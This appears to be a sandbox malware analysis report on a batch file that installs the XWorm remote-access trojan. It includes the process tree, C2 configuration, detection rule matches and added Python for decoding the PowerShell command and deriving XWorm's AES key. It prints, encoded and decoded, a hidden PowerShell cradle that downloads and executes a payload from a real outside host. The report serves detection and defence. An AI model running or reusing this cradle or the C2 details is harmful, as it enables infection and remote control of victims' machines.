
Windows Analysis Report
92.255.85.2.bat

Overview

General Information

Sample name: 92.255.85.2.bat
Analysis ID: 1648674
MD5: dba98e15d9d6d186ec7b4029f49691a9
SHA1: c21a4ab95820f33bff18b333ff33a880f0a7e5dd
SHA256: 3f7b520f93027782e5db0e094dd1924c78e6562eb6156dd5d001ec4076413be4
Tags: 92-255-85-2bat, booking, clickfix, fakecaptcha, SPAM-ITA, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7872 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 2168 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • MSBuild.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
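The PowerShell command line in the process tree is the whole infection chain in one argument: `-e` takes base64 over UTF-16LE (which is why the blob is about three times the length of the script it hides), and the outer switches disable the execution policy and hide the window. The following Python is an added example, not part of this report or of the sample, that decodes that exact command line and flags the indicators the Sigma rules listed above key on. It uses only the standard library; the command line is copied from PID 7872 above, and the indicator regexes and the list of "decoy" extensions are assumptions of the example.

```python
"""Decode and triage the -EncodedCommand seen in this report's process tree."""
import base64
import re
from typing import Optional

# Constructed from the process tree above: the exact command line cmd.exe handed
# to powershell.exe (PID 7872).
CMDLINE = (
    "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e "
    "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA=="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# plus the documented alias -ec. -ExecutionPolicy is not in this set.
ENCODED_SWITCHES = {"-ec"} | {"-encodedcommand"[:i] for i in range(2, 16)}

# Outer-switch and cradle indicators (assumed regexes, same things the Sigma rules above flag).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e[px]\w*\s+bypass", re.I),  # -ExecutionPolicy / -ep Bypass
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),                # -WindowStyle / -w Hidden
    "no_profile": re.compile(r"-nop\w*", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# A script served under a media/document extension (here: a.mp4) is a decoy extension.
DECOY_EXTENSIONS = (".mp4", ".mp3", ".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt")


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the base64 argument following an -EncodedCommand style switch, if any."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_SWITCHES:
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage(cmdline: str) -> dict:
    """Decode the payload (if present) and list the indicators found in switches and script."""
    payload = extract_encoded_payload(cmdline)
    decoded = decode_encoded_command(payload) if payload else ""
    # The outer switches live in the command line, the cradle itself in the decoded script.
    text = cmdline + "\n" + decoded
    flags = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    urls = URL_RE.findall(decoded)
    if any(u.lower().endswith(DECOY_EXTENSIONS) for u in urls):
        flags.append("decoy_extension")
    return {"decoded": decoded, "urls": urls, "flags": flags}


if __name__ == "__main__":
    result = triage(CMDLINE)
    print("decoded :", result["decoded"])
    print("urls    :", result["urls"])
    print("flags   :", ", ".join(result["flags"]))
```

For this sample the decoded script is `$c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')`, i.e. the second stage is fetched as text from the same host that later serves as C2 and executed in memory; the `.mp4` name exists only to look harmless in proxy logs.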

Malware Configuration

{
  "C2 url": [
    "92.255.85.2"
  ],
  "Port": 4372,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe",
  "Version": "XWorm V5.66"
}
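The "Aes key" above is a five-character seed, not a usable AES key. Public analyses of XWorm describe a fixed MD5-based key schedule that the bot applies to its key strings before AES-ECB (the KEY setting shown here for its C2 packets, and the mutex string for its embedded settings). The Python below is an added example, not code from this report or from the sample: it reproduces that schedule and the matching decrypt routine. It assumes this build uses the stock routine (confirm against the unpacked MSBuild.exe image listed in the Yara section before relying on it) and needs pycryptodome only for the AES round trip; the key schedule itself runs with the standard library.

```python
"""Key schedule behind the "Aes key" field of the XWorm configuration above."""
import base64
import hashlib


def xworm_aes_key(key_string: str) -> bytes:
    """Expand an XWorm key string into the 32-byte AES key the bot actually uses.

    Stock XWorm (publicly documented; assumed to apply to this build) does:
        hash = MD5(key); buf[0:16] = hash; buf[15:31] = hash; buf[31] = 0
    so the key is hash[:15] + hash + b"\\x00", not the short string itself.
    """
    digest = hashlib.md5(key_string.encode("utf-8")).digest()
    buf = bytearray(32)
    buf[0:16] = digest
    buf[15:31] = digest  # second copy overwrites byte 15
    buf[31] = 0
    return bytes(buf)


def xworm_decrypt(b64_ciphertext: str, key_string: str) -> str:
    """AES-256-ECB with PKCS7 padding over a base64 blob (stock XWorm decrypt).
    pycryptodome is imported lazily so the key schedule works without it."""
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    cipher = AES.new(xworm_aes_key(key_string), AES.MODE_ECB)
    return unpad(cipher.decrypt(base64.b64decode(b64_ciphertext)), AES.block_size).decode("utf-8")


def xworm_encrypt(plaintext: str, key_string: str) -> str:
    """Inverse of xworm_decrypt, only here to exercise a round trip; the bot ships its
    settings already encrypted."""
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    cipher = AES.new(xworm_aes_key(key_string), AES.MODE_ECB)
    return base64.b64encode(cipher.encrypt(pad(plaintext.encode("utf-8"), AES.block_size))).decode()


if __name__ == "__main__":
    key = xworm_aes_key("P0WER")  # the "Aes key" value from the configuration above
    print("derived AES key:", key.hex())
    try:
        # Constructed plaintext, not a string recovered from the sample.
        blob = xworm_encrypt("92.255.85.2", "P0WER")
        print("round trip:", xworm_decrypt(blob, "P0WER"))
    except ImportError:
        print("install pycryptodome to run the AES round trip")
```

The practical consequence: a Suricata or proxy rule can match the SPL delimiter `<Xwormmm>` only on the decrypted side, so to inspect the port 4372 traffic offline you need the derived 32-byte key, not the string in the configuration.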
Source | Rule | Description | Author | Strings
dump.pcap | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x85445:$s4: Stub.exe
  • 0x8555f:$s4: Stub.exe
  • 0x8f192:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8f22f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f344:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8f004:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x6a80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6b1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6c32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x68f2:$cnc4: POST / HTTP/1.1
00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x6f630:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x71273:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6f6cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x71310:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6f7e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x71425:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6f4a2:$cnc4: POST / HTTP/1.1
  • 0x710e5:$cnc4: POST / HTTP/1.1
00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(4 further entries not shown)
Source | Rule | Description | Author | Strings
11.2.MSBuild.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
11.2.MSBuild.exe.400000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x58a9:$str01: $VB$Local_Port
  • 0x589a:$str02: $VB$Local_Host
  • 0x5ba0:$str03: get_Jpeg
  • 0x5552:$str04: get_ServicePack
  • 0x6546:$str05: Select * from AntivirusProduct
  • 0x6744:$str06: PCRestart
  • 0x6758:$str07: shutdown.exe /f /r /t 0
  • 0x680a:$str08: StopReport
  • 0x67e0:$str09: StopDDos
  • 0x68d6:$str10: sendPlugin
  • 0x6956:$str11: OfflineKeylogger Not Enabled
  • 0x6aae:$str12: -ExecutionPolicy Bypass -File "
  • 0x6bd7:$str13: Content-length: 5235
11.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6af2:$cnc4: POST / HTTP/1.1
3.2.powershell.exe.28919871ea0.3.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.2.powershell.exe.28919871ea0.3.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x3aa9:$str01: $VB$Local_Port
  • 0x3a9a:$str02: $VB$Local_Host
  • 0x3da0:$str03: get_Jpeg
  • 0x3752:$str04: get_ServicePack
  • 0x4746:$str05: Select * from AntivirusProduct
  • 0x4944:$str06: PCRestart
  • 0x4958:$str07: shutdown.exe /f /r /t 0
  • 0x4a0a:$str08: StopReport
  • 0x49e0:$str09: StopDDos
  • 0x4ad6:$str10: sendPlugin
  • 0x4b56:$str11: OfflineKeylogger Not Enabled
  • 0x4cae:$str12: -ExecutionPolicy Bypass -File "
  • 0x4dd7:$str13: Content-length: 5235
(13 further entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", ProcessId: 2168, ProcessName: csc.exe
Source: Process started | Author: frack113 | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ProcessId: 7872, ProcessName: powershell.exe

Data Obfuscation

